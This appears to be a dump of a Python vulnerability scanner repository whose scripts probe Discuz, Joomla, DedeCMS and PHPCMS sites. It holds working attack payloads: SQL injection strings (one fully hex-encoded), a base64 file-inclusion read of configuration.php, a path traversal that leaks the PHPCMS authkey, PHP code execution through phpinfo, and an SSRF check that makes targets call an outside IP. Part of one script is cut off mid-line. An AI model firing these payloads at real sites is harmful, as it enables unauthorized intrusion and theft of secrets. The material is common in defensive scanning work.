'5.7.18', 31 | '20111209': '5.6', 32 | '20120430': '5.7SP or 5.7 or 5.6', 33 | '20120621': '5.7SP1 or 5.7 or 5.6', 34 | '20120709': '5.6', 35 | '20121030': '5.7SP1 or 5.7', 36 | '20121107': '5.7', 37 | '20130608': 'V5.6-Final', 38 | '20130922': 'V5.7SP1'} 39 | ver_list = sorted(list(ver_histroy.keys())) 40 | ver_list.append(arg) 41 | sorted_ver_list=sorted(ver_list) 42 | return ver_histroy[ver_list[sorted_ver_list.index(arg) - 1]] 43 | 44 | def run(self): 45 | headers = { 46 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 47 | } 48 | payload = "/data/admin/ver.txt" 49 | vulnurl = self.url + payload 50 | try: 51 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 52 | m = re.search("^(\d+)$", req.text) 53 | if m: 54 | cprint("[+]探测到dedecms版本...(敏感信息)\t时间戳: %s, 版本信息: %s"%(m.group(1), self.check_ver(m.group(1))), "green") 55 | return True 56 | else: 57 | cprint("[-]不存在dedecms_version漏洞", "white", "on_grey") 58 | 59 | except: 60 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 61 | 62 | if __name__ == "__main__": 63 | warnings.filterwarnings("ignore") 64 | testVuln = dedecms_version_BaseVerify(sys.argv[1]) 65 | testVuln.run() -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__init__.py -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__pycache__/__init__.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__pycache__/discuz_focus_flashxss.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_focus_flashxss.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__pycache__/discuz_focus_flashxss.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_focus_flashxss.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__pycache__/discuz_forum_message_ssrf.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_forum_message_ssrf.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__pycache__/discuz_forum_message_ssrf.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_forum_message_ssrf.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__pycache__/discuz_plugin_ques_sqli.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_plugin_ques_sqli.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__pycache__/discuz_plugin_ques_sqli.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_plugin_ques_sqli.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__pycache__/discuz_x25_path_disclosure.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_x25_path_disclosure.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__pycache__/discuz_x25_path_disclosure.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_x25_path_disclosure.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/discuz_focus_flashxss.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: discuz X3 focus.swf flashxss漏洞 5 | referer: unknown 6 | author: Lucifer 7 | description: 文件中focus.swf存在flashxss。 8 | ''' 9 | import sys 10 | import urllib 11 | import hashlib 12 | import requests 13 | import warnings 14 | from termcolor import cprint 15 | 16 | class discuz_focus_flashxss_BaseVerify: 17 | def __init__(self, url): 18 | self.url = url 19 | 20 | def run(self): 21 | headers = { 22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 23 | } 24 | flash_md5 = "c16a7c6143f098472e52dd13de85527f" 25 | payload = "/static/image/common/focus.swf" 26 | vulnurl = self.url + payload 27 | try: 28 | req = urllib.request.urlopen(vulnurl) 29 | data = req.read() 30 | md5_value = hashlib.md5(data).hexdigest() 31 | if md5_value in flash_md5: 32 | cprint("[+]存在discuz X3 focus.swf flashxss漏洞...(高危)\tpayload: "+vulnurl, "red") 33 | return True 34 | else: 35 | cprint("[-]不存在discuz_focus_flashxss漏洞", "white", "on_grey") 36 | 37 | except: 38 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 39 | 40 | if __name__ == "__main__": 41 | warnings.filterwarnings("ignore") 42 | testVuln = discuz_focus_flashxss_BaseVerify(sys.argv[1]) 43 | testVuln.run() -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/discuz_forum_message_ssrf.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: discuz论坛forum.php参数message SSRF漏洞 5 | referer: unknown 6 | author: Lucifer 7 | description: trs infogate插件 blind XML实体注入。 8 | ''' 9 | import sys 10 | import time 11 | import hashlib 12 | import datetime 13 | import requests 14 | import warnings 15 | from termcolor import cprint 16 | 17 | class discuz_forum_message_ssrf_BaseVerify: 18 | def __init__(self, url): 19 | self.url = url 20 | 21 | def run(self): 22 | headers = { 23 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", 24 | } 25 | time_stamp = time.mktime(datetime.datetime.now().timetuple()) 26 | m = hashlib.md5(str(time_stamp).encode(encoding='utf-8')) 27 | md5_str = m.hexdigest() 28 | payload = "/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://45.76.158.91:6868/"+md5_str+".jpg[/img]&formhash=09cec465" 29 | vulnurl = self.url + payload 30 | try: 31 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 32 | eye_url = "http://45.76.158.91/web.log" 33 | time.sleep(6) 34 | reqr = requests.get(eye_url, timeout=10, verify=False) 35 | if md5_str in reqr.text: 36 | cprint("[+]存在discuz论坛forum.php参数message SSRF漏洞...(中危)\tpayload: "+vulnurl, "yellow") 37 | return True 38 | else: 39 | cprint("[-]不存在discuz_forum_message_ssrf漏洞", "white", "on_grey") 40 | 41 | except: 42 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 43 | 44 | if __name__ == "__main__": 45 | warnings.filterwarnings("ignore") 46 | testVuln = discuz_forum_message_ssrf_BaseVerify(sys.argv[1]) 47 | testVuln.run() 48 | -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/discuz_plugin_ques_sqli.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | # -*- coding: utf-8 -*- 4 | ''' 5 | name: discuz问卷调查参数orderby注入漏洞 6 | referer: http://0day5.com/archives/3184/ 7 | author: Lucifer 8 | description: 文件plugin.php中,参数orderby存在SQL注入。 9 | ''' 10 | import sys 11 | import requests 12 | import warnings 13 | from termcolor import cprint 14 | 15 | class discuz_plugin_ques_sqli_BaseVerify: 16 | def __init__(self, url): 17 | self.url = url 18 | 19 | def run(self): 20 | headers = { 21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 22 | } 23 | payload = "/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline/**/And/**/1=(UpdateXml(1,ConCat(0x7e,Md5(1234)),1))--" 24 | vulnurl = self.url + payload 25 | try: 26 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 27 | if r"81dc9bdb52d04dc20036dbd8313ed05" in req.text: 28 | cprint("[+]存在discuz问卷调查参数orderby注入漏洞...(高危)\tpayload: "+vulnurl, "red") 29 | return True 30 | else: 31 | cprint("[-]不存在discuz_plugin_ques_sqli漏洞", "white", "on_grey") 32 | 33 | except: 34 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 35 | 36 | if __name__ == "__main__": 37 | warnings.filterwarnings("ignore") 38 | testVuln = discuz_plugin_ques_sqli_BaseVerify(sys.argv[1]) 39 | testVuln.run() -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/discuz_x25_path_disclosure.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: discuz! X2.5 物理路径泄露漏洞 5 | referer: http://www.uedbox.com/discuzx25-explosive-path/ 6 | author: Lucifer 7 | description: 报错导致路径泄露。 8 | ''' 9 | import re 10 | import sys 11 | import requests 12 | import warnings 13 | from termcolor import cprint 14 | 15 | class discuz_x25_path_disclosure_BaseVerify: 16 | def __init__(self, url): 17 | self.url = url 18 | 19 | def run(self): 20 | headers = { 21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 22 | } 23 | payloads = ["/uc_server/control/admin/db.php", 24 | "/source/plugin/myrepeats/table/table_myrepeats.php", 25 | "/install/include/install_lang.php"] 26 | try: 27 | for payload in payloads: 28 | vulnurl = self.url + payload 29 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 30 | pattern = re.search('Fatal error.* in ([^<]+) on line (\d+)', req.text) 31 | if pattern: 32 | cprint("[+]存在Discuz! X2.5 物理路径泄露漏洞...(低危)\tpayload: "+vulnurl+"\tGet物理路径: "+pattern.group(1), "green") 33 | return True 34 | else: 35 | cprint("[-]不存在discuz_x25_path_disclosure漏洞", "white", "on_grey") 36 | 37 | except: 38 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 39 | 40 | if __name__ == "__main__": 41 | warnings.filterwarnings("ignore") 42 | testVuln = discuz_x25_path_disclosure_BaseVerify(sys.argv[1]) 43 | testVuln.run() -------------------------------------------------------------------------------- /POC_Scan/cms/joomla/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__init__.py -------------------------------------------------------------------------------- /POC_Scan/cms/joomla/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/joomla/__pycache__/__init__.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/joomla/__pycache__/joomla_com_docman_lfi.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__pycache__/joomla_com_docman_lfi.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/joomla/__pycache__/joomla_com_docman_lfi.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__pycache__/joomla_com_docman_lfi.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/joomla/__pycache__/joomla_index_list_sqli.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__pycache__/joomla_index_list_sqli.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/joomla/__pycache__/joomla_index_list_sqli.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__pycache__/joomla_index_list_sqli.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/joomla/joomla_com_docman_lfi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: joomla组件com_docman本地文件包含 5 | referer: https://www.exploit-db.com/exploits/37620 6 | author: Lucifer 7 | description: joomla组件com_docman 文件com_docman/dl2.php中参数file被base64解码后可造成文件包含漏洞。 8 | ''' 9 | import sys 10 | import requests 11 | import warnings 12 | from termcolor import cprint 13 | 14 | class joomla_com_docman_lfi_BaseVerify: 15 | def __init__(self, url): 16 | self.url = url 17 | 18 | def run(self): 19 | headers = { 20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 21 | } 22 | payload = "/components/com_docman/dl2.php?archive=0&file=Li4vY29uZmlndXJhdGlvbi5waHA=" 23 | vulnurl = self.url + payload 24 | try: 25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 26 | if req.status_code == 200 and r"可能不存在漏洞", "cyan") 34 | 35 | if __name__ == "__main__": 36 | warnings.filterwarnings("ignore") 37 | testVuln = joomla_com_docman_lfi_BaseVerify(sys.argv[1]) 38 | testVuln.run() -------------------------------------------------------------------------------- /POC_Scan/cms/joomla/joomla_index_list_sqli.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: joomla 3.7.0 core SQL注入 5 | referer: https://www.08sec.com/bobao/15167.html 6 | author: Lucifer 7 | description: joomla!3.7.0新引入的一个组件”com_fields“,这个组件任何人都可以访问,无需登陆验证。由于对请求数据过滤不严导致sql注入. 8 | ''' 9 | import sys 10 | import requests 11 | import warnings 12 | from termcolor import cprint 13 | 14 | class joomla_index_list_sqli_BaseVerify: 15 | def __init__(self, url): 16 | self.url = url 17 | 18 | def run(self): 19 | headers = { 20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 21 | } 22 | payload = "/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,Md5(1234)),0)" 23 | vulnurl = self.url + payload 24 | try: 25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 26 | if r"81dc9bdb52d04dc20036dbd8313ed05" in req.text: 27 | cprint("[+]存在joomla 3.7.0 core SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red") 28 | return True 29 | else: 30 | cprint("[-]不存在joomla_index_list_sqli漏洞", "white", "on_grey") 31 | 32 | except: 33 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 34 | 35 | if __name__ == "__main__": 36 | warnings.filterwarnings("ignore") 37 | testVuln = joomla_index_list_sqli_BaseVerify(sys.argv[1]) 38 | testVuln.run() -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__init__.py -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/__init__.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_authkey_disclosure.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_authkey_disclosure.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_authkey_disclosure.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_authkey_disclosure.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_digg_add_sqli.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_digg_add_sqli.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_digg_add_sqli.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_digg_add_sqli.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_flash_upload_sqli.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_flash_upload_sqli.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_flash_upload_sqli.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_flash_upload_sqli.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_product_code_exec.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_product_code_exec.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_product_code_exec.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_product_code_exec.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_v961_fileread.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_v961_fileread.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_v961_fileread.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_v961_fileread.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_v96_sqli.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_v96_sqli.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_v96_sqli.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_v96_sqli.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_v9_flash_xss.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_v9_flash_xss.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_v9_flash_xss.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_v9_flash_xss.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/phpcms_authkey_disclosure.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: phpcms authkey泄露 5 | referer: http://wooyun.org/bugs/wooyun-2015-0105242 6 | author: Lucifer 7 | description: PHPCMS authkey 泄露漏洞,可引起SQL注入。 8 | ''' 9 | import re 10 | import sys 11 | import requests 12 | import warnings 13 | from termcolor import cprint 14 | 15 | class phpcms_authkey_disclosure_BaseVerify: 16 | def __init__(self, url): 17 | self.url = url 18 | 19 | def run(self): 20 | headers = { 21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 22 | } 23 | payload = "/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\\applist&path=admin" 24 | vulnurl = self.url + payload 25 | try: 26 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 27 | m = re.search('(\w{32})',req.text) 28 | if req.status_code == 200 and m: 29 | cprint("[+]存在PHPCMS authkey泄露漏洞...(高危)\tpayload: "+vulnurl+"\tauthkey: "+m.group(1), "red") 30 | return True 31 | else: 32 | cprint("[-]不存在phpcms_authkey_disclosure漏洞", "white", "on_grey") 33 | 34 | except: 35 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 36 | 37 | if __name__ == "__main__": 38 | warnings.filterwarnings("ignore") 39 | testVuln = phpcms_authkey_disclosure_BaseVerify(sys.argv[1]) 40 | testVuln.run() -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/phpcms_digg_add_sqli.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: phpcms digg_add.php SQL注入 5 | referer: http://www.shangxueba.com/jingyan/2195152.html 6 | author: Lucifer 7 | description: 文件digg_add.php中,参数digg_mod存在SQL注入。 8 | ''' 9 | import sys 10 | import requests 11 | import warnings 12 | from termcolor import cprint 13 | 14 | class phpcms_digg_add_sqli_BaseVerify: 15 | def __init__(self, url): 16 | self.url = url 17 | 18 | def run(self): 19 | headers = { 20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 21 | } 22 | payload = "/digg/digg_add.php?id=1&con=2&digg_mod=digg_data%20WHERE%201=2%20+and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,md5(1234),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23" 23 | vulnurl = self.url + payload 24 | try: 25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: 27 | cprint("[+]存在PHPCMS digg_add.php SQL注入漏洞...(高危)\t\tpayload: "+vulnurl, "red") 28 | return True 29 | else: 30 | cprint("[-]不存在phpcms_digg_add_sqli漏洞", "white", "on_grey") 31 | 32 | except: 33 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 34 | 35 | if __name__ == "__main__": 36 | warnings.filterwarnings("ignore") 37 | testVuln = phpcms_digg_add_sqli_BaseVerify(sys.argv[1]) 38 | testVuln.run() 39 | -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/phpcms_flash_upload_sqli.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: phpcms2008 flash_upload.php SQL注入 5 | referer: unknown 6 | author: Lucifer 7 | description: 文件flash_upload.php中,参数modelid存在SQL注入。 8 | ''' 9 | import sys 10 | import requests 11 | import warnings 12 | from termcolor import cprint 13 | 14 | class phpcms_flash_upload_sqli_BaseVerify: 15 | def __init__(self, url): 16 | self.url = url 17 | 18 | def run(self): 19 | headers = { 20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 21 | } 22 | payload = "/flash_upload.php?modelid=%30%20%61%6E%64%28%73%65%6C%65%63%74%20%31%20%66%72%6F%6D%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%2C%63%6F%6E%63%61%74%28%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%63%6F%6E%63%61%74%28%30%78%37%65%2C%6D%64%35%28%33%2E%31%34%31%35%29%2C%30%78%37%65%29%29%29%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%6C%69%6D%69%74%20%30%2C%31%29%2C%66%6C%6F%6F%72%28%72%61%6E%64%28%30%29%2A%32%29%29%78%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%67%72%6F%75%70%20%62%79%20%78%29%61%29" 23 | vulnurl = self.url + payload 24 | try: 25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 26 | if r"63e1f04640e83605c1d177544a5a0488" in req.text: 27 | cprint("[+]存在phpcms2008 flash_upload.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red") 28 | return True 29 | else: 30 | cprint("[-]不存在phpcms_flash_upload_sqli漏洞", "white", "on_grey") 31 | 32 | except: 33 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 34 | 35 | if __name__ == "__main__": 36 | warnings.filterwarnings("ignore") 37 | testVuln = phpcms_flash_upload_sqli_BaseVerify(sys.argv[1]) 38 | testVuln.run() -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/phpcms_product_code_exec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: phpcms2008 product.php 代码执行 5 | referer: http://www.wooyun.org/bugs/WooYun-2011-02984 6 | author: Lucifer 7 | description: 文件product.php中,参数pagesize存在代码注入。 8 | ''' 9 | import sys 10 | import requests 11 | import warnings 12 | from termcolor import cprint 13 | 14 | class phpcms_product_code_exec_BaseVerify: 15 | def __init__(self, url): 16 | self.url = url 17 | 18 | def run(self): 19 | headers = { 20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 21 | } 22 | payload = "/yp/product.php?pagesize=${@phpinfo()}" 23 | vulnurl = self.url + payload 24 | try: 25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 26 | if r"Configuration File (php.ini) Path" in req.text: 27 | cprint("[+]存在phpcms2008 product.php 代码执行漏洞...(高危)\tpayload: "+vulnurl, "red") 28 | return True 29 | else: 30 | cprint("[-]不存在phpcms_product_code_exec漏洞", "white", "on_grey") 31 | 32 | except: 33 | cprint("[-] "+__file__+"====>可能不存在漏洞", 